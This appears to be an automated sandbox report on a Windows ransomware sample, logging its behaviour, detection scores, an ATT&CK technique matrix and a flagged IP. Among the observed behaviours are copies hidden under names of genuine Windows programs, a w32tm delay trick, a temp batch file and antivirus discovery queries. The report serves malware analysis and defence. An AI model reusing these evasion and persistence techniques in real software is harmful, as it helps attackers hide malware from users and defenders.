            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeThread delayed: delay time: 922337203685477
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 600000
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 599890
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 599781
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 599672
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 599562
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 599453
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 599343
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 599234
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 599125
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 599015
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 598906
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 598797
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 598687
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 598578
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 598468
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 598356
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 598248
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 600000
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 599875
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 599765
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 599656
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 599547
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 599437
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 599328
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 599218
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 599109
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 599000
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 598890
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 598781
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 598671
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 598562
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 598453
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 598343
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 598234
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 600000
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 599890
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 599781
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 599672
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 599563
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 599453
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 599344
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 599234
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 599125
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 599013
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 598906
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 598797
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 598686
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 598578
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 598267
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 598141
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 600000
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 599875
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 599765
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 599654
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 599531
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 599421
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 599312
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 599203
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 599094
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 598969
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 598859
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 598750
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 598640
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 598531
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 598422
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 598312
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 598203
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeFile opened: C:\Users\user\AppData
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeFile opened: C:\Users\user\AppData\Local
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeFile opened: C:\Users\user
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeFile opened: C:\Users\user\Documents\desktop.ini
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeFile opened: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeFile opened: C:\Users\user\AppData\Local\Temp
            Source: xMLVfJVxhYAkoCJ.exe, 00000029.00000002.2646534252.000000001BC6F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|
            Source: XPC5PMKegV.exe, 00000000.00000002.2132442923.000000001BD6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\qb&?
            Source: w32tm.exe, 0000001A.00000002.2179361537.000001B63E2D8000.00000004.00000020.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000026.00000002.2467348183.000000001B700000.00000004.00000020.00020000.00000000.sdmp, System.exe, 00000028.00000002.2528852928.000000001C050000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess token adjusted: Debug
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess token adjusted: Debug
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeProcess token adjusted: Debug
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess token adjusted: Debug
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeProcess token adjusted: Debug
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess token adjusted: Debug
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeProcess token adjusted: Debug
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess token adjusted: Debug
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeMemory allocated: page read and write | page guard
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yrs7rIEeUp.bat"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe"
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeQueries volume information: C:\Users\user\Desktop\XPC5PMKegV.exe VolumeInformation
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeQueries volume information: C:\Recovery\xMLVfJVxhYAkoCJ.exe VolumeInformation
            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeQueries volume information: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe VolumeInformation
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeQueries volume information: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe VolumeInformation
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeQueries volume information: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe VolumeInformation
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeQueries volume information: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe VolumeInformation
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeQueries volume information: C:\Program Files (x86)\Microsoft.NET\System.exe VolumeInformation
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeQueries volume information: C:\Program Files (x86)\Microsoft.NET\System.exe VolumeInformation
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeQueries volume information: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe VolumeInformation
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeQueries volume information: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe VolumeInformation
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeQueries volume information: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe VolumeInformation
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeQueries volume information: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe VolumeInformation
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeQueries volume information: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe VolumeInformation
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeQueries volume information: C:\Program Files (x86)\Microsoft.NET\System.exe VolumeInformation
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeQueries volume information: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe VolumeInformation
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: StartMenuExperienceHost.exe, 00000026.00000002.2467226901.000000001B6E9000.00000004.00000020.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000026.00000002.2466914090.000000001B6B1000.00000004.00000020.00020000.00000000.sdmp, System.exe, 00000028.00000002.2528852928.000000001C050000.00000004.00000020.00020000.00000000.sdmp, xMLVfJVxhYAkoCJ.exe, 00000029.00000002.2646157930.000000001BC30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

            Stealing of Sensitive Information

            Source: Yara match; File source: Process Memory Space: XPC5PMKegV.exe PID: 4924, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: xMLVfJVxhYAkoCJ.exe PID: 6684, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: StartMenuExperienceHost.exe PID: 6840, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: StartMenuExperienceHost.exe PID: 5060, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: System.exe PID: 1708, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: System.exe PID: 1600, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: xMLVfJVxhYAkoCJ.exe PID: 1912, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: xMLVfJVxhYAkoCJ.exe PID: 6248, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: xMLVfJVxhYAkoCJ.exe PID: 5204, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: StartMenuExperienceHost.exe PID: 6320, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: System.exe PID: 5764, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: xMLVfJVxhYAkoCJ.exe PID: 6316, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match; File source: Process Memory Space: XPC5PMKegV.exe PID: 4924, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: xMLVfJVxhYAkoCJ.exe PID: 6684, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: StartMenuExperienceHost.exe PID: 6840, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: StartMenuExperienceHost.exe PID: 5060, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: System.exe PID: 1708, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: System.exe PID: 1600, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: xMLVfJVxhYAkoCJ.exe PID: 1912, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: xMLVfJVxhYAkoCJ.exe PID: 6248, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: xMLVfJVxhYAkoCJ.exe PID: 5204, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: StartMenuExperienceHost.exe PID: 6320, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: System.exe PID: 5764, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: xMLVfJVxhYAkoCJ.exe PID: 6316, type: MEMORYSTR
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | 1 Scripting | Valid Accounts | 241 Windows Management Instrumentation | 1 Scheduled Task/Job | 11 Process Injection | 23 Masquerading | OS Credential Dumping | 241 Security Software Discovery | Remote Services | 11 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 Scripting | 1 Scheduled Task/Job | 1 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | 31 Registry Run Keys / Startup Folder | 31 Registry Run Keys / Startup Folder | 151 Virtualization/Sandbox Evasion | Security Account Manager | 151 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 11 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Obfuscated Files or Information | Cached Domain Credentials | 34 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 21 Software Packing | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            [Behavior graph] Behavior Graph ID: 1500508; Sample: XPC5PMKegV.exe; Startdate: 28/08/2024; Architecture: WINDOWS; Score: 100

            Source | Detection | Scanner | Label | Link
            XPC5PMKegV.exe | 79% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
            XPC5PMKegV.exe | 100% | Avira | HEUR/AGEN.1323342
            XPC5PMKegV.exe | 100% | Joe Sandbox ML
            Source | Detection | Scanner | Label | Link
            C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe | 100% | Avira | HEUR/AGEN.1323342
            C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe | 100% | Avira | HEUR/AGEN.1323342
            C:\Users\user\AppData\Local\Temp\yrs7rIEeUp.bat | 100% | Avira | BAT/Delbat.C
            C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe | 100% | Avira | HEUR/AGEN.1323342
            C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe | 100% | Avira | HEUR/AGEN.1323342
            C:\Program Files (x86)\Microsoft.NET\System.exe | 100% | Avira | HEUR/AGEN.1323342
            C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe | 100% | Avira | HEUR/AGEN.1323342
            C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe | 100% | Avira | HEUR/AGEN.1323342
            C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe | 100% | Joe Sandbox ML
            C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe | 100% | Joe Sandbox ML
            C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe | 100% | Joe Sandbox ML
            C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe | 100% | Joe Sandbox ML
            C:\Program Files (x86)\Microsoft.NET\System.exe | 100% | Joe Sandbox ML
            C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe | 100% | Joe Sandbox ML
            C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe | 100% | Joe Sandbox ML
            C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe | 79% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files (x86)\Microsoft.NET\System.exe | 79% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe | 79% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe | 79% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
            C:\Recovery\xMLVfJVxhYAkoCJ.exe | 79% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\xMLVfJVxhYAkoCJ.exe | 79% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
            C:\Windows\IdentityCRL\production\xMLVfJVxhYAkoCJ.exe | 79% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
            No Antivirus matches
            No Antivirus matches
            No contacted domains info
            IP | Domain | Country | Flag | ASN | ASN Name | Malicious
            92.63.98.227 | unknown | Russian Federation | | 29182 | THEFIRST-ASRU | true
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1500508
            Start date and time:2024-08-28 15:31:07 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 7m 41s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:42
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
